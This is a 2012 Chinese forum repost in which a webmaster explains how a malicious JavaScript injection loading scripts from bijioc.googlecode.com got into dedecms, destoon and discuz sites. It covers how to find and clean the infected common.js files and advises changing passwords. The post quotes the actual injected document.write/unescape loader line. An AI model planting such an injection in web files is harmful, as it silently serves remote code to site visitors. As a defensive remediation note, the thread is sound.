源码论坛,商业源码下载,尽在锦尚中国商业源码论坛

标题: 网站被恶意弹出bijioc.googlecode.com注入解决办法 [打印本页]

作者: mikel 时间: 2012-2-29 09:39
标题: 网站被恶意弹出bijioc.googlecode.com注入解决办法
刚刚发现自己的网站访问时，总是提示弹出一个SVN的窗口

上面的地址是 http://bijioc.googlecode.com/

看来是被恶意js注入了，

目前网站用的是dedecms，destoon的程序，于是百度一下，发现中招的还不少

原来是被在引用的js文件中注入了如下代码：
1 document.write(unescape("%3Cscript src='http://bijioc.googlecode.com/svn/trunk/js/navigatenormal.js?v="+(new Date().toDateString().replace(/\s/g, ''))+".js' type='text/<span class="wp_keywordlink_affiliate"><a href="http://www.mikel.cn/category/%e5%bc%80%e5%8f%91%e7%ac%94%e8%ae%b0/javascript" title="JavaScript" target="_blank">JavaScript</a></span>'%3E%3C/script%3E"));

下面说下我清理过程，首先还是打开我们网站的主页，依然是弹出那个可恶的窗口，关闭，然后用查看下网页源码没有发现异常，那是因为这段代码是利用js输出的，需要查看生成后的最终代码，可以利用firefox中的web developer插件中查看源代码中的查看处理后的源码项，就发现居然在头部引用了一个如下格式的js脚本：
1 <script type="text/<span class="wp_keywordlink_affiliate"><a href="http://www.mikel.cn/category/%e5%bc%80%e5%8f%91%e7%ac%94%e8%ae%b0/javascript" title="JavaScript" target="_blank">JavaScript</a></span>" src="static/js/common.js?9VJ"/>
2 <script type="text/<span class="wp_keywordlink_affiliate"><a href="http://www.mikel.cn/category/%e5%bc%80%e5%8f%91%e7%ac%94%e8%ae%b0/javascript" title="JavaScript" target="_blank">JavaScript</a></span>" src="static/js/common.js?9VJ">// <![CDATA[
3 <script type="text/javascript" src="http://bijioc.googlecode.com/svn/trunk/js/navigatebbs.js?v=WedFeb292012.js"/>

接下来就是查找被注入的js文件是哪个了，以上面的为例就是common.js文件了，以此类推，依次排查有问题的网站页面源码，只要寻找生成后的页面代码中存在bijioc.googlecode.com前面的js文件修改就行了，为了方便大家总结下我的网站被注入的dedecms的js路径是 /站点根目录/include/dedeajax2.js ;destoon的js路径是/站点目录/file/script/common.js; discuz的js路径/站点目录/static/js/common.js；

最后还要提醒大家及时修改ftp的密码和数据库密码，同时排查空间中是不是有木马程序，因为既然js文件被人修改说明网站的密码已经被人无限制，能够上场文件了，一定存在木马，要彻底清查。

转自：www.mikel.cn

作者: 2248740205 时间: 2012-5-15 22:48
4567

作者: 2248740205 时间: 2012-5-15 22:49
7675656576788990

欢迎光临源码论坛,商业源码下载,尽在锦尚中国商业源码论坛 (https://bbs.52jscn.com/)